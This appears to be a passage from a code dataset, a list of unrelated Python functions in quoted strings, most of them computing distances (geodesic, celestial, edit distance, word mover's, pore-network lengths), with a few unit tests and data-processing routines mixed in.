np.nan_to_num(share)).sum()\n iteration += 1\n\n share = np.nan_to_num(share)\n\n count = 0\n for exc in d_act[d]['exchanges']:\n if 'cement' in exc['product'] and exc['type'] == \"technosphere\":\n exc['amount'] = share[count]\n count += 1\n\n return d_act", "def test_distance():\n t0 = time.time()\n c1 = coord.CelestialCoord(0.234 * coord.radians, 0.342 * coord.radians)\n c2 = coord.CelestialCoord(0.234 * coord.radians, -1.093 * coord.radians)\n c3 = coord.CelestialCoord((pi + 0.234) * coord.radians, -0.342 * coord.radians)\n c4 = coord.CelestialCoord((pi + 0.234) * coord.radians, 0.832 * coord.radians)\n c5 = coord.CelestialCoord(1.832 * coord.radians, -0.723 * coord.radians)\n c6 = coord.CelestialCoord((0.234 + 2.3e-9) * coord.radians, (0.342 + 1.2e-9) * coord.radians)\n t1 = time.time()\n\n a1 = astropy.coordinates.SkyCoord(0.234 * units.radian, 0.342 * units.radian)\n a2 = astropy.coordinates.SkyCoord(0.234 * units.radian, -1.093 * units.radian)\n a3 = astropy.coordinates.SkyCoord((pi + 0.234) * units.radian, -0.342 * units.radian)\n a4 = astropy.coordinates.SkyCoord((pi + 0.234) * units.radian, 0.832 * units.radian)\n a5 = astropy.coordinates.SkyCoord(1.832 * units.radian, -0.723 * units.radian)\n a6 = astropy.coordinates.SkyCoord(0.234 + 2.3e-9, 0.342 + 1.2e-9, unit=units.radian)\n t2 = time.time()\n\n coord_dist = [c1.distanceTo(c).rad for c in [c2,c3,c4,c5,c6]]\n t3 = time.time()\n astropy_dist = [a1.separation(a).rad for a in 
[a2,a3,a4,a5,a6]]\n t4 = time.time()\n\n np.testing.assert_almost_equal(coord_dist, astropy_dist, decimal=12)\n # For the last one, the distance is rather small in radians, so test in arcsec\n np.testing.assert_almost_equal(coord_dist[-1] * (coord.radians/coord.arcsec),\n astropy_dist[-1] * (coord.radians/coord.arcsec), decimal=10)\n\n print('Compare times for distance calculations:')\n print(' Make CelestialCoords: t = ',t1-t0)\n print(' Make SkyCoords: t = ',t2-t1)\n print(' Calculate distances with Coord: t = ',t3-t2)\n print(' Calculate distances with Astropy: t = ',t4-t3)", "def calcDist(indexLabel1,indexLabel2):\n x1=xCord[indexLabel1]\n x2=xCord[indexLabel2]\n y1=yCord[indexLabel1]\n y2=yCord[indexLabel2]\n z1=zCord[indexLabel1]\n z2=zCord[indexLabel2]\n distance=(((x1-x2)**2+(y2-y1)**2+(z2-z1)**2)**0.5)\n return distance", "def _computeRdist(self, rtype, lon, lat, depth):\n\n # ----------------------------\n # Sort out ps2ff parameters\n # ----------------------------\n origin = self._origin\n mech = getattr(origin, 'mech', 'ALL')\n if not hasattr(origin, '_tectonic_region'):\n mscale = MagScaling.WC94\n smech = Mechanism.A\n mindip_deg = 10.0\n maxdip_deg = 90.0\n aspect = 1.7\n elif origin._tectonic_region == 'Active Shallow Crust':\n mscale = MagScaling.HB08\n aspect = 1.7\n if mech == 'ALL':\n # HB08 doesn't have an 'ALL' mechanism, so use WC94\n mscale = MagScaling.WC94\n smech = Mechanism.A\n mindip_deg = 10.0\n maxdip_deg = 90.0\n elif mech == 'RS':\n smech = Mechanism.R\n mindip_deg = 35.0\n maxdip_deg = 50.0\n elif mech == 'NM':\n smech = Mechanism.N\n mindip_deg = 40.0\n maxdip_deg = 60.0\n elif mech == 'SS':\n smech = Mechanism.SS\n mindip_deg = 75.0\n maxdip_deg = 90.0\n elif origin._tectonic_region == 'Stable Shallow Crust':\n mscale = MagScaling.S14\n aspect = 1.0\n if mech == 'ALL':\n smech = Mechanism.A\n mindip_deg = 10.0\n maxdip_deg = 90.0\n elif mech == 'RS':\n smech = Mechanism.R\n mindip_deg = 30.0\n maxdip_deg = 60.0\n elif mech == 'NM':\n smech = Mechanism.N\n mindip_deg = 40.0\n maxdip_deg = 60.0\n elif mech == 'SS':\n smech = Mechanism.SS\n mindip_deg = 60.0\n maxdip_deg = 90.0\n else:\n logging.warning(\n 'Unsupported tectonic region; using coefficients for unknown'\n 'tectonic region.')\n mscale = MagScaling.WC94\n smech = Mechanism.A\n aspect = 1.7\n mindip_deg = 10.0\n maxdip_deg = 90.0\n\n mindip = mindip_deg * np.pi / 180.0\n maxdip = maxdip_deg * np.pi / 180.0\n\n repis = np.clip(self.computeRepi(lon, lat, depth), 0.0001, None)\n\n repi, Rjb_hat, Rrup_hat, Rjb_var, Rrup_var = \\\n single_event_adjustment(origin.mag, origin.depth, ar=aspect,\n mechanism=smech, mag_scaling=mscale,\n n_repi=13,\n min_repi=np.min(repis) - 1e-5,\n max_repi=np.max(repis) + 0.1,\n nxny=7, n_theta=19,\n n_dip=4, min_dip=mindip, max_dip=maxdip,\n n_eps=5, trunc=2)\n\n if rtype == 'Rjb':\n spline = spint.interp1d(repi, np.vstack((Rjb_hat, Rjb_var)),\n kind='linear', copy=False,\n assume_sorted=True)\n rv_hat = spline(repis)\n elif rtype == 'Rrup':\n spline = spint.interp1d(repi, np.vstack((Rrup_hat, Rrup_var)),\n kind='linear', copy=False,\n assume_sorted=True)\n rv_hat = spline(repis)\n else:\n raise ValueError('Unknown distance type in _computeRdist')\n return (rv_hat[0], rv_hat[1])", "def cdist(c1, c2, otype=0, frame=False):\n if not otype in [0, 1, 2]:\n raise ValueError(\"unsupported otype: %d, must be in 0:2\" % otype)\n assert c1.shape[0] == c2.shape[0]\n T = c1.shape[0]\n\n s = ((c1[:, 1:] - c2[:, 1:])**2).sum(-1)\n if otype == 0:\n s = numpy.sqrt(2 * s) * 10 / 
numpy.log(10)\n elif otype == 2:\n s = numpy.sqrt(s)\n if frame:\n return s\n else:\n return s.mean()", "def ctc(target):\n network = target.project.network\n throats = network.throats(target.name)\n cn = network['throat.conns'][throats]\n C1 = network['pore.coords'][cn[:, 0]]\n C2 = network['pore.coords'][cn[:, 1]]\n value = _norm(C1 - C2, axis=1)\n return value", "def find_TSS_CRE_pairs(self):\n if self.verbose >= 2:\n print(\"\\r{}\\rFinding TSS-cCRE pairs\".format(' ' * 80), end='', file=sys.stderr)\n TSS_ranges = self.find_TSS_ranges()\n if self.skip_cre_promoter:\n pair_indices = numpy.r_[0, numpy.cumsum(TSS_ranges[:, 1] - TSS_ranges[:, 0]\n + TSS_ranges[:, 3] - TSS_ranges[:, 2])]\n else:\n pair_indices = numpy.r_[0, numpy.cumsum(TSS_ranges[:, 1] - TSS_ranges[:, 0])]\n # Normalize predicted values for easy correlation\n pair_queue = multiprocessing.JoinableQueue()\n results_queue = multiprocessing.JoinableQueue()\n processes = []\n for i in range(self.threads):\n processes.append(multiprocessing.Process(\n target=self._find_correlations, args=(pair_queue, results_queue)))\n processes[-1].daemon = True\n processes[-1].start()\n step = 50\n for i in range(self.chroms.shape[0]):\n for j in range(self.rna_indices[i], self.rna_indices[i + 1], step):\n end = min(j + step, self.rna_indices[i + 1])\n pair_queue.put((j, end, TSS_ranges[j:end, :]))\n for i in range(self.threads):\n pair_queue.put(None)\n pairs = numpy.zeros((pair_indices[-1], 3), dtype=numpy.int32)\n valid = numpy.zeros(pair_indices[-1], dtype=numpy.bool)\n finished = 0\n while finished < self.threads:\n results = results_queue.get(True)\n if results is None:\n finished += 1\n continue\n for i in range(len(results)):\n index, corrs = results[i][:2]\n s = pair_indices[index]\n e = pair_indices[index + 1]\n pairs[s:e, 0] = index\n if self.skip_cre_promoter:\n pairs[s:e, 1] = numpy.r_[numpy.arange(TSS_ranges[index, 0], TSS_ranges[index, 1]),\n numpy.arange(TSS_ranges[index, 2], TSS_ranges[index, 3])]\n else:\n pairs[s:e, 1] = numpy.arange(TSS_ranges[index, 0], TSS_ranges[index, 1])\n valid[s:e] = corrs >= self.corr_cutoff\n self.pairs = pairs[numpy.where(valid)[0], :]\n self.TSS_indices = numpy.r_[0, numpy.cumsum(numpy.bincount(self.pairs[:, 0],\n minlength=self.tssN))]\n self.selected = numpy.ones(self.pairs.shape[0], dtype=numpy.bool)\n if self.pca is not None:\n self.find_PCAs()\n if self.maxcres > 0:\n where = numpy.where(self.TSS_indices[1:] - self.TSS_indices[:-1] > self.maxcres)[0]\n for i in where:\n s, e = self.TSS_indices[i:(i + 2)]\n self.selected[self.rng.choice(numpy.arange(s, e), e - s - self.maxcres,\n replace=False)] = False\n if self.verbose >= 2:\n print(\"\\r{}\\r\".format(' ' * 80), end='', file=sys.stderr)\n kept = numpy.sum(valid)\n temp = numpy.bincount(self.pairs[:, 0], weights=self.selected, minlength=self.tssN)\n self.logger.info(\"Retained {} of {} TSS-CRE pairs ({:02.2f}%), {} - {} CREs/TSS (median {})\".format(\n self.selected.shape[0], valid.shape[0],\n 100. 
* self.selected.shape[0] / valid.shape[0],\n numpy.amin(temp), numpy.amax(temp), numpy.median(temp)))\n self.logger.info(\"Unique CREs in pairings: {}\".format(numpy.unique(self.pairs[:, 1]).shape[0]))", "def distance(self, first_tape, second_tape):\n pairs = zip(first_tape, second_tape)\n return math.sqrt(abs(sum(map((lambda n: self.subsq(*n)), pairs))))", "def communication_delay(self, begin, end):\n\n duration, path = self.movement_model.shortest_distance(begin, end)\n path_clusters = self.count_clusters(path)\n\n segment_speed_pairs = list()\n path_index = 0\n last_segment = None\n for path_cluster in path_clusters:\n segments = list()\n if last_segment:\n segments.append(last_segment)\n\n while path[path_index] in path_cluster.tour.objects:\n segments.append(path[path_index])\n last_segment = path[path_index]\n\n path_index += 1\n if path_index >= len(path):\n break\n\n segment_speed_pairs.append((path_cluster.mdc_speed, segments))\n\n travel_delay = 0. # * pq.second\n for speed, segments in segment_speed_pairs:\n cluster_distance = 0 # * pq.meter\n start_segment = segments[0]\n for end_segment in segments[1:]:\n distance = np.linalg.norm(\n start_segment.location.nd - end_segment.location.nd)\n cluster_distance += distance\n\n travel_delay += cluster_distance / speed\n\n transmission_delay = len(path_clusters)\n transmission_delay *= data.segment_volume(begin, end, self.env)\n transmission_delay /= self.env.comms_rate\n\n relay_delay = self.holding_time(path_clusters[1:])\n\n total_delay = travel_delay + transmission_delay + relay_delay\n return total_delay", "def test_example_10_sparse():\n import pandas as pd\n from tcrdist.repertoire import TCRrep\n from tcrdist.rep_funcs import pw2dense\n import numpy as np\n\n df = pd.read_csv(\"dash.csv\")\n df2 = pd.read_csv(\"dash2.csv\")\n df = df.head(10) #(1)\n tr = TCRrep(cell_df = df, #(2)\n df2 = df2, \n organism = 'mouse', \n chains = ['alpha','beta'], \n db_file = 'alphabeta_gammadelta_db.tsv')\n\n tr.compute_rect_distances(df = tr.clone_df, df2 = df2)\n assert tr.rw_alpha.shape == (10,1924) \n assert tr.rw_beta.shape == (10,1924)\n\n rw_alpha = tr.rw_alpha.copy()\n rw_beta = tr.rw_beta.copy()\n\n radius = 100\n tr.cpus = 1\n tr.compute_sparse_rect_distances(df = tr.clone_df, df2 = df2, radius = radius)\n d = pw2dense(tr.rw_alpha, radius)\n print(rw_alpha[:2, :10])\n print(tr.rw_alpha.todense()[:2, :10])\n print(d[:2, :10])\n assert np.all(rw_alpha[rw_alpha <= radius] == d[d <= radius])\n\n d = pw2dense(tr.rw_beta, radius)\n assert np.all(rw_beta[rw_beta <= radius] == d[d <= radius])\n\n \n radius = 5000\n tr.compute_sparse_rect_distances(df = tr.clone_df, df2 = df2, radius = radius)\n d = pw2dense(tr.rw_alpha, radius)\n print(rw_alpha[:2, :10])\n print(tr.rw_alpha.todense()[:2, :10])\n assert np.all(rw_alpha == d)\n\n d = pw2dense(tr.rw_beta, radius)\n assert np.all(rw_beta == d)", "def dist_chord(datamtx, strict=True):\n if strict:\n if not all(isfinite(datamtx)):\n raise ValueError(\"non finite number in input matrix\")\n if rank(datamtx) != 2:\n raise ValueError(\"input matrix not 2D\")\n numrows, numcols = shape(datamtx)\n else:\n try:\n numrows, numcols = shape(datamtx)\n except ValueError:\n return zeros((0,0),'d')\n\n if numrows == 0 or numcols == 0:\n return zeros((0,0),'d')\n dists = zeros((numrows,numrows),'d')\n for i in range(numrows):\n r1 = datamtx[i] # cache here\n r1norm = norm(r1)\n for j in range(i):\n r2 = datamtx[j]\n r2norm = norm(r2)\n if r1norm == 0.0 or r2norm == 0.0:\n if r1norm == 0.0 and r2norm == 0.0:\n 
dist = 0.0\n else: dist = 1.0\n else:\n dist = norm(r1/r1norm - r2/r2norm)\n dists[i,j] = dists[j,i] = dist\n\n return dists", "def calc_dist(c1: Coordinates, c2: Coordinates = None) -> float:\n\t\n\t# Get distances for each dimension in a common unit, meters.\n\tlat_dist = (c1.lat - c2.lat) * LAT_RATIO\n\tlong_dist = (c1.lon - c2.lon) * LONG_RATIO\n\treturn math.sqrt(lat_dist**2 + long_dist**2)", "def calc_distance(\n target_batch_keys, target_keys_pred, batch_assignments_gt, src_key_num_gt\n):\n batch_keys_gt = torch.bmm(batch_assignments_gt, target_batch_keys[:, :, :2])\n err = distance(target_keys_pred, batch_keys_gt, src_key_num_gt)\n return err", "def _compute_dist(x_obs, x_theo):\n\n from fastdtw import fastdtw\n score, path = fastdtw(x_obs, x_theo, dist=2)\n\n return score", "def test_distances(self):\n sf = make_classifier_data(n=10, d=2, seed=37)\n sf.remove_column(\"class\", inplace=True)\n\n numeric_features = [\"int0\", \"int1\", \"float0\", \"float1\"]\n array_features = [\"array0\"]\n string_features = [\"str0\"]\n dict_features = [\"dict0\"]\n\n ## Numeric standard distances should work for numeric columns\n for d in [\n \"euclidean\",\n \"squared_euclidean\",\n \"manhattan\",\n \"cosine\",\n \"transformed_dot_product\",\n ]:\n try:\n m = tc.dbscan.create(\n sf,\n features=numeric_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## Numeric standard distances should work for array columns\n for d in [\n \"euclidean\",\n \"squared_euclidean\",\n \"manhattan\",\n \"cosine\",\n \"transformed_dot_product\",\n ]:\n try:\n m = tc.dbscan.create(\n sf,\n features=array_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## String standard distances should work.\n for d in [\"levenshtein\"]:\n try:\n m = tc.dbscan.create(\n sf,\n features=string_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## Dictionary standard distances should work.\n for d in [\"jaccard\", \"weighted_jaccard\", \"cosine\", \"transformed_dot_product\"]:\n try:\n m = tc.dbscan.create(\n sf,\n features=dict_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n # Nonsensical combinations of feature types and distances should fail.\n with self.assertRaises(ValueError):\n m = tc.dbscan.create(\n sf,\n features=numeric_features,\n distance=\"levenshtein\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n with self.assertRaises(ToolkitError):\n m = tc.dbscan.create(\n sf,\n features=dict_features,\n distance=\"levenshtein\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n with self.assertRaises(ToolkitError):\n m = tc.dbscan.create(\n sf,\n features=string_features,\n distance=\"euclidean\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n # If no distance is specified, the automatic distance construction\n # should kick in and be correct.\n correct_dist = [\n [[\"str0\"], \"levenshtein\", 1],\n [[\"str1\"], \"levenshtein\", 1],\n [[\"dict0\"], \"jaccard\", 1],\n [[\"int0\", \"int1\", \"float0\", \"float1\"], \"euclidean\", 1],\n [[\"array0\"], \"euclidean\", 1],\n ]\n\n m = tc.dbscan.create(\n sf, radius=1, distance=None, min_core_neighbors=3, verbose=False\n )\n\n 
self.assertItemsEqual(m.distance, correct_dist)\n\n m = tc.dbscan.create(\n sf, radius=1, distance=\"auto\", min_core_neighbors=3, verbose=False\n )\n self.assertItemsEqual(m.distance, correct_dist)", "def cal_dist(origs,dests):\n\tradius = 6371.009 # km\n\tif origs.ndim:\n\t\tlat1, lon1 = origs\n\t\tlat2, lon2 = dests\n\telse:\n\t\tlat1 = origs[0,:]\n\t\tlon1 = origs[1,:]\n\t\tlat2 = dests[0,:]\n\t\tlon2 = dests[1,:]\n\tdlat = (lat2-lat1) / 180. * np.pi\n\tdlon = (lon2-lon1) / 180. * np.pi\n\ta = np.sin(dlat/2) * np.sin(dlat/2) + np.cos(lat1 / 180. * np.pi) \\\n\t\t* np.cos(lat2 / 180. * np.pi) * np.sin(dlon/2) * np.sin(dlon/2)\n\tc = 2 * np.arctan2(np.sqrt(a), np.sqrt(1-a))\n\treturn radius * c", "def get_dist_cost(data, start_node_id, end_node_id):\n p1 = get_coords(data, start_node_id)\n p2 = get_coords(data, end_node_id)\n return great_circle_distance(p1, p2)", "def distance(self):\n _, _, costs = self.calculate_costs()\n return np.sum(costs)", "def _pairwise_dist(self,seq1,seq2):\n \n return jf.damerau_levenshtein_distance(str(seq1), str(seq2))", "def get_race_distance(self):\n race_id = self.get_current_race_id(include_horse=False)\n race_id_with_horse = self.get_current_race_id(include_horse=True)\n try:\n distance = self.consolidated_races_db.data.loc[race_id, 'distance']\n return distance\n except KeyError:\n try:\n distance = self.db.data.loc[race_id_with_horse, 'distance']\n return distance\n except KeyError:\n self.verbose_print(f'No race distance info found for {self.current_race_id}')\n return None", "def Distance2RRhoPhi(r1,r2,r3):\n \n # Calculate the square-distances of \n # each pair of atoms.\n r1 = np.array(r1)\n r2 = np.array(r2) \n r3 = np.array(r3)\n \n rr1 = r1*r1\n rr2 = r2*r2\n rr3 = r3*r3\n \n return TriatomicRadialPolar.DistanceSquared2RRhoPhi(rr1,rr2,rr3)", "def dc_dt(self,C,t,K):\n \n # dc/dt built up by separately computing the positive and negative contributions.\n # In our example positive_dcdt = [0, k1[A], k2[B]] and negative_dcdt = [-k1[A],-k2[B],0]\n reaction_matrix = np.array(self.reaction_matrix,dtype=np.int)\n C = np.array(C)\n #K = np.array(K.valuesdict().values())\n\n # need to have the same number of rate parameters in K\n # as indicated in reaction_matrix!\n assert len(K) == np.sum(reaction_matrix)\n \n # need to be careful about dtypes:\n # reaction matrix dtype is int, rate matrix must be dtype float\n rate_matrix = reaction_matrix.copy()\n rate_matrix.dtype=np.float64\n rate_matrix[reaction_matrix==1] = K\n \n positive_dcdt = rate_matrix.T.dot(C)\n negative_dcdt = rate_matrix.T.sum(axis=0)*C\n \n return positive_dcdt - negative_dcdt", "def calc_distances(ftr, prfx=None):\n print(time.asctime(), ' Computing distances')\n start = time.time()\n dst = util.compute_pair_distances(ftr)\n end = time.time()\n print(time.asctime(), ' Done Computing distances in ', end-start, ' seconds', flush=True)\n\n # Only save if requested (this can be a very large file)\n if prfx is not None:\n np.save('mat_' + prfx, dst)\n\n return dst", "def distance(brd1,brd2):\n\n step=brd1[1,0]-brd1[0,0]\n return np.sum(np.abs(brd1[:,1]-brd2[:,1]))*step", "def get_wmd_dist(s1, s2, model):\r\n s1 = s1.lower().strip().split()\r\n s2 = s2.lower().strip().split()\r\n\r\n distance = model.wmdistance(s1, s2)\r\n return distance", "def trame_distance(t1, t2):\n return np.linalg.norm(t1 - t2)", "def _distance_from_weights(self, data):\n input_data = array(data)\n weights_flat = self._weights.reshape(-1, self._weights.shape[2])\n input_data_sq = power(input_data, 2).sum(axis=1, 
keepdims=True)\n weights_flat_sq = power(weights_flat, 2).sum(axis=1, keepdims=True)\n cross_term = dot(input_data, weights_flat.T)\n return sqrt(-2 * cross_term + input_data_sq + weights_flat_sq.T)", "def distance(self, wn1, wn2):\n return abs(self.chunk_map[wn1] - self.chunk_map[wn2])", "def test_4():\n\n # generate two locusts of points\n npts = 100\n epsilon = 0.001\n # #cluster 1\n coords1 = generate_locus_of_3d_points(npts, 0.1, 0.1, 0.1, epsilon=epsilon)\n # cluster 2\n coords2 = generate_locus_of_3d_points(npts, 0.9, 0.9, 0.9, epsilon=epsilon)\n\n # generate orientation vectors for cluster 1\n vectors1 = generate_aligned_vectors(len(coords1))\n\n # calculate dot product between vectors1 and cluster 2\n r = np.sqrt((0.9 - 0.1) ** 2 + (0.9 - 0.1) ** 2 + (0.9 - 0.1) ** 2)\n # s, vector between coords1 and cluster2\n s = np.zeros((npts, 3))\n s[:, 0] = 0.9 - coords1[:, 0]\n s[:, 1] = 0.9 - coords1[:, 1]\n s[:, 2] = 0.9 - coords1[:, 2]\n\n # calculate dot product between orientation and direction between cluster 1 and 2\n angles = angles_between_list_of_vectors(vectors1, s)\n costheta_squared = np.cos(angles) * np.cos(angles) # dot product between vectors\n avg_costheta_squared = np.mean(costheta_squared)\n\n # define radial bins\n rbins = np.array([0.0, 0.1, r + 2.0 * epsilon])\n\n # define weights appropiate for weighting function\n weights1 = np.ones((npts, 4))\n weights1[:, 1] = vectors1[:, 0]\n weights1[:, 2] = vectors1[:, 1]\n weights1[:, 3] = vectors1[:, 2]\n weights2 = np.ones(npts)\n\n # calculate weighted counts\n weighted_counts, counts = positional_marked_npairs_3d(\n coords1,\n coords2,\n rbins,\n period=None,\n weights1=weights1,\n weights2=weights2,\n weight_func_id=4,\n num_threads=1,\n )\n\n msg = \"weighted counts do not match expected result given the weighting function\"\n assert np.isclose(\n weighted_counts[-1], avg_costheta_squared * counts[-1], rtol=1.0 / npts\n ), msg", "def test_example_12():\n\timport pandas as pd\n\tfrom tcrdist.repertoire import TCRrep\n\timport numpy as np\n\n\tdf = pd.read_csv(\"dash.csv\").head(100)\n\ttr = TCRrep(cell_df = df,\n\t\torganism = 'mouse',\n\t\tchains = ['alpha','beta'],\n\t\tdb_file = 'alphabeta_gammadelta_db.tsv',\n\t\tstore_all_cdr=False,\n\t\tarchive_result=True,\n\t\tarchive_name = \"example_archive\")\n\n\ttr2 = TCRrep(cell_df = None,\n\t\torganism = 'mouse',\n\t\tchains = ['alpha','beta'],\n\t\tdb_file = 'alphabeta_gammadelta_db.tsv',\n\t\tblank = True,\n\t\tarchive_name = \"example_archive\")\n\ttr2.rebuild()\n\n\t# Check that all atrributes are the same after rebuild, except metrics which can't be zipped\n\tfor k in tr2.__dict__.keys():\n\t\tprint(k)\n\t\tif k in ['all_genes','metrics_a','metrics_b','metrics_d', 'metrics_g',\n\t\t\t\t'kargs_a','kargs_b','kargs_d','kargs_g']:\n\t\t\tpass\n\t\telse:\n\t\t\tassert np.all(getattr(tr, k) == getattr(tr2, k) )\n\n\tfor k in ['all_genes','metrics_a','metrics_b', 'kargs_a','kargs_b']:\n\t\tassert isinstance(getattr(tr2, k), dict)\n\t\tassert set(getattr(tr, k).keys()) - set(getattr(tr2, k).keys()) == set()", "def process_ctd():\n ctd_concat_list = []\n ctd_flist = glob.glob(CMORE_BULA_path + \"CTD/\" + \"*.ctd\")\n for ctd_cast in ctd_flist:\n df = pd.read_csv(\n ctd_cast,\n delim_whitespace=True,\n skiprows=3,\n names=[\n \"CTDPRS\",\n \"CTDTMP\",\n \"CTDSAL\",\n \"CTDOXY\",\n \"PAR\",\n \"LS6000\",\n \"CHLPIG\",\n \"NITRATE\",\n \"num_observations\",\n \"QUALT1\",\n ],\n )\n df.replace(-9.0, np.nan, inplace=True)\n station_cast_meta = 
os.path.basename(ctd_cast).split(\".\")[0].split(\"bu1\")[1]\n df[\"station\"] = station_cast_meta.split(\"s\")[1].split(\"c\")[0].zfill(3)\n df[\"cast\"] = (\n station_cast_meta.split(\"c\")[1].split(\"up\")[0].split(\"dn\")[0].zfill(3)\n )\n df[\"cast_direction\"] = station_cast_meta[-2:]\n df[\"num_observations\"] = df[\"num_observations\"].astype(str).str.zfill(5)\n df[\n [\n \"CTDPRS_flag\",\n \"CTDTMP_flag\",\n \"CTDSAL_flag\",\n \"CTDOXY_flag\",\n \"PAR_flag\",\n \"LS6000_flag\",\n \"CHLPIG_flag\",\n \"NITRATE_flag\",\n ]\n ] = (\n df[\"QUALT1\"].astype(str).str.extractall(\"(.)\")[0].unstack()\n )\n df.drop(\n [\"NITRATE\", \"NITRATE\", \"LS6000\", \"LS6000_flag\", \"QUALT1\"],\n axis=1,\n inplace=True,\n )\n\n ctd_concat_list.append(df)\n concat_df = pd.concat(ctd_concat_list, axis=0, ignore_index=True)\n return concat_df", "def test_get_lm3_dist(self, dist):\n pytest.importorskip(\"lmoments3\")\n dc = generic.get_dist(dist)\n lm3dc = generic.get_lm3_dist(dist)\n par = self.params[dist]\n expected = dc(**par).pdf(self.inputs_pdf)\n values = lm3dc(**par).pdf(self.inputs_pdf)\n np.testing.assert_array_almost_equal(values, expected)", "def conduit_lengths(network, throats=None, mode='pore'):\n if throats is None:\n throats = network.throats()\n Ps = network['throat.conns']\n pdia = network['pore.diameter']\n\n if mode == 'centroid':\n try:\n pcentroids = network['pore.centroid']\n tcentroids = network['throat.centroid']\n if _sp.sum(_sp.isnan(pcentroids)) + _sp.sum(_sp.isnan(tcentroids)) > 0:\n mode = 'pore'\n else:\n plen1 = _sp.sqrt(_sp.sum(_sp.square(pcentroids[Ps[:, 0]] -\n tcentroids), 1))-network['throat.length']/2\n plen2 = _sp.sqrt(_sp.sum(_sp.square(pcentroids[Ps[:, 1]] -\n tcentroids), 1))-network['throat.length']/2\n except KeyError:\n mode = 'pore'\n if mode == 'pore':\n # Find half-lengths of each pore\n pcoords = network['pore.coords']\n # Find the pore-to-pore distance, minus the throat length\n lengths = _sp.sqrt(_sp.sum(_sp.square(pcoords[Ps[:, 0]] -\n pcoords[Ps[:, 1]]), 1)) - network['throat.length']\n lengths[lengths < 0.0] = 2e-9\n # Calculate the fraction of that distance from the first pore\n try:\n fractions = pdia[Ps[:, 0]]/(pdia[Ps[:, 0]] + pdia[Ps[:, 1]])\n # Don't allow zero lengths\n# fractions[fractions == 0.0] = 0.5\n# fractions[fractions == 1.0] = 0.5\n except:\n fractions = 0.5\n plen1 = lengths*fractions\n plen2 = lengths*(1-fractions)\n\n return _sp.vstack((plen1, network['throat.length'], plen2)).T[throats]", "def damerau_levenshtein_distance(comp_sec):\n s1 = comp_sec['log_trace']\n s2 = comp_sec['sim_trace']\n p1 = comp_sec['proc_log_trace']\n p2 = comp_sec['proc_sim_trace']\n w1 = comp_sec['wait_log_trace']\n w2 = comp_sec['wait_sim_trace']\n d = {}\n lenstr1 = len(s1)\n lenstr2 = len(s2)\n for i in range(-1,lenstr1+1):\n d[(i,-1)] = i+1\n for j in range(-1,lenstr2+1):\n d[(-1,j)] = j+1\n for i in range(0, lenstr1):\n for j in range(0, lenstr2):\n if s1[i] == s2[j]:\n t1 = p1[i] + w1[i]\n if t1 > 0:\n b1 = (p1[i]/t1)\n b2 = (w1[i]/t1)\n cost = (b1*abs(p2[j]-p1[i])) + (b2*abs(w2[j]-w1[i]))\n else:\n cost = 0\n else:\n cost = 1\n d[(i,j)] = min(\n d[(i-1,j)] + 1, # deletion\n d[(i,j-1)] + 1, # insertion\n d[(i-1,j-1)] + cost, # substitution\n )\n if i and j and s1[i]==s2[j-1] and s1[i-1] == s2[j]:\n d[(i,j)] = min (d[(i,j)], d[i-2,j-2] + cost) # transposition\n return d[lenstr1-1,lenstr2-1]", "def dist_word(self, str1):\n\n min_dist = float(\"inf\")\n min_str = \"\"\n\n if str1 in self._txt1.data:\n # allocate list for computation of the maximum 
size\n warp = [[1 for j in range(int(self._txt1[str1].freq * self._groupFactor) + 1)]\n for i in range(self._txt1[str1].freq + 1)]\n\n for str2 in self._distWords[str1]:\n dist = float(self._distWords[str1][str2])\n if dist == float(\"inf\"):\n # compute dtw\n dist = self.dtw(warp, self.txt1[str1].rec, self.txt2[str2].rec)\n self._distWords[str1][str2] = dist\n if dist < min_dist:\n min_dist = dist\n min_str = str2\n return min_dist, min_str", "def distance_between_gt_pred(gt_list_rad, pred_list_rad):\n\n gt_len, pred_len = gt_list_rad.shape[0], pred_list_rad.shape[0]\n ind_pairs = np.array([[x, y] for y in range(pred_len) for x in range(gt_len)])\n cost_mat = np.zeros((gt_len, pred_len))\n\n # Slow implementation\n # cost_mat = np.zeros((gt_len, pred_len))\n # for gt_cnt, gt in enumerate(gt_list_rad):\n # for pred_cnt, pred in enumerate(pred_list_rad):\n # cost_mat[gt_cnt, pred_cnt] = distance_between_spherical_coordinates_rad(gt, pred)\n\n # Fast implementation\n if gt_len and pred_len:\n az1, ele1, az2, ele2 = gt_list_rad[ind_pairs[:, 0], 0], gt_list_rad[ind_pairs[:, 0], 1], \\\n pred_list_rad[ind_pairs[:, 1], 0], pred_list_rad[ind_pairs[:, 1], 1]\n cost_mat[ind_pairs[:, 0], ind_pairs[:, 1]] = distance_between_spherical_coordinates_rad(az1, ele1, az2, ele2)\n\n row_ind, col_ind = linear_sum_assignment(cost_mat)\n cost = cost_mat[row_ind, col_ind].sum()\n return cost", "def distance(self, c1, c2):\n if c1 > c2:\n c1, c2 = c2, c1\n clusterDistance = self.clusterDistanceCache.get((c1,c2), None)\n if clusterDistance is None:\n # Find the maximum distance between any two pairs in the clusters.\n #\n maxDistance = ConstantValueFeatureComparisonResult(0.0)\n for b1 in self.c2b[c1]:\n for b2 in self.c2b[c2]:\n baseDistance = self._baseDistance(b1, b2)\n if baseDistance > maxDistance:\n maxDistance = baseDistance\n clusterDistance = maxDistance\n self.clusterDistanceCache[(c1,c2)] = clusterDistance\n return clusterDistance", "def calculate_d4ct(self, pairs_dct=None):\n #a, b, c, d, e, f, g, h, i\n if pairs_dct is None:\n pairs_dct={\n 'D': 'A',\n 'G': 'A',\n 'E': 'B',\n 'H': 'B',\n 'F': 'C',\n 'I': 'C',\n }\n data = deepcopy(self.d3ct)\n results_dct = {}\n for cell_line, normalizer in list(pairs_dct.items()):\n cell_data = data.query('cell_line ==\"{}\"'.format(cell_line))\n norm_data = data.query('cell_line ==\"{}\"'.format(normalizer))\n cell_data.index = cell_data.index.droplevel('cell_line')\n norm_data.index = norm_data.index.droplevel('cell_line')\n 